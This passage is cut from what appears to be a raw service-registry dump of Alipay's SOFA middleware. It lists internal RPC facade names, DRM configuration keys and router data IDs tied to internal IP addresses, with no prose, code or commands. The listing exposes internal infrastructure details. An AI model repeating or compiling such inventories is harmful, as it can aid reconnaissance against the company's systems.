_30.50.26.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.100.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.ei.dias.v2.service.DataService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.levelzero.api.LztransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.useJvmCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.BemcDataPermissionManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.MngRuntimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.unifiedasset.image.AssetUnifiedComposeImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecogw.facade.EcoGwTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemProcessAfterRepeatHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.shopminiapp.facade.api.item.ShopItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finresprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.pamir.ajax.PamAjaxServiceMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPaaSBatchOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.risk.RiskMarketNewComputing:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:create_submerchant_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@guardianconsole#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:distinguishprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbizlink.common.service.facade.api.InstRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.SpiDelayInvokeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:mobileops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.easytest.agent.facade.SchedulerTriggerFacade:1.0:ifxquote_scedulerTriggerFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.DecisionCodeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.147.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiMarketingAmtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imatchfacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:hnbc_plus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.agreement.facade.TerminalUserAgreementWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepP2PFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-omegakoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_CSS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfocore.common.service.facade.fop.api.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspricecore.common.service.facade.InsPriceCoreSaleSellerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antchaos.facade.api.ChaosSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucns.common.service.facade.PushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.api.BizInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ordermng.common.service.api.order.SimpleOrderOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.service.facade.PepEventMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.facade.QuestionSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.slipob_gc_v20190903.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:crmhomeEquipmentRepealProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.finscene.drm.TaskBaseControlDrm.taskEnvSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.158.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:darwin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.cancel.FintradeCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MREXCASHIER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:forexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:AEICORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.openQueryResultLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.common.service.facade.monitor.PublicMonitorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.ConclusionQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.checkroute.common.service.trigger.HAServiceMetaQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:decisionx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.compute.common.service.facade.api.eventcompute.EventComputeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingFileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.LittleAppCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.query.facade.api.MobileVipManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.common.service.FeatureGroupMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeShopBannerPidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:aliinvoiceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zteslaDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.27.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.life.LifeNotifyInfoServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PayPasswordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.common.service.task.facade.SingleTaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:alideviceinfo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.pcard.api.PCardVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arater@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILESEARCHMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditrmp.GrayTaskImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.dynamic.ServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.system.RestHealthCheckService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodswitch.common.service.facade.ContractProductSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.163.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@insclaiminvestprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetTransApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydataservice:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","etetestcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.query.MobileAckQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceUserPrizeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.PrizeRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.pub.PublicAppManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryUnconfirmTransVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.core.service.task.AdTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CREDITMCPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.clearingcenter.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.complaint.ComplaintAttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bkpromofront.facade.p2p.CouponPlayShareQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilebill.common.service.facade.mng.BusinRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FININFLUX_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.72.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gclearingcenter.facade.api.GclearingSettlementModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ServerLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.manage.facade.api.RelevancySymbolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inslifeprod.common.facade.management.InsLifeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rel.api.AppRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.189.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instbizlink.common.service.facade.api.InstLinkRuleConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.ActivePaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.aoliao.api.DxResultMngManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.account.CfpAccountMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.taobaocategory.TaoBaoCategoryAlipayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.FinPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.FailoverDBSourceDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:openexprodTimeoutCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventbusversion.EventBusVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelRepaireSolutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterReportBankFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.cgtemplate.ConditionGroupTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d11961aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue47#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iriskplancksg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.GroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.impl.monitor.MonitorRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAppBaseInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaserver.facade.ZproxyGPvSofaService:1.0:zproxyGForM@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:buamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.craftsman.GoodsQueryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.99.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.progov.service.api.QuotaThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.212.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.36.5.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.25.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchmobile.common.service.facade.dingtalk.UserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.luckyball.LuckyBallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:workflow_tsd_signQueryAbilityFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.tag.MerchantTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhubalipay.smileservice.service.SmileFaceDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.servicegovern.common.service.facade.MetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilepep.service.facade.backend.CardAbTestDataApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FileDenominatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.OperateLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.AuthOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.fusion.PensionFusionCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imobilemng.ac.wallet.settle.MoapSettleQueryMngService:1.0:ipayMoapSettleQueryMngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdmp.common.service.facade.tag.MrchTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antprivacy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.DynamicLayoutItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.redeem.InstRedeemCapitalCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.generalInvoice.InvoiceCompanyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.sw.service.GrayService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.reviseCreateAndPublish,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.core.model.antworkbench.repository.AntWorkOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.BillQueryBankConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.QueryBillFacade:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.refundChargeDecideByCharge,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalRansomSysCallBack2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.GrayPublishServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrisk.common.service.InsRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CommonGreyScenarioFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.platform.api.PctTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.CarRenewalPolicyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.ProductViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycenter.common.service.facade.nac.NacGuidToOtpSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:ldprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.CaringPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.inspect.LifeInspectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.EscrowRefundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.monitor.MetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securitylock.SecurityLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcgfcenter_workflowProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.runtime.etl.spi.FeatureCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:admgr@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.api.UnfreezeAndTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.policy.api.PolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.anteduprod.common.service.facade.api.certify.EduCampusCardExamineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:bpoAccommodationDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchprod.common.service.facade.AppointmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.label.editor.isFlowLimitUserInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.infosecTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransQueryFacade:1.0:acctrans@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.task.InsLifeTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.blessSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZAPPINFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincompose.common.service.facade.serial.ComposeSerialNoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.openSaveResult,version=3.0@DRM#@#DE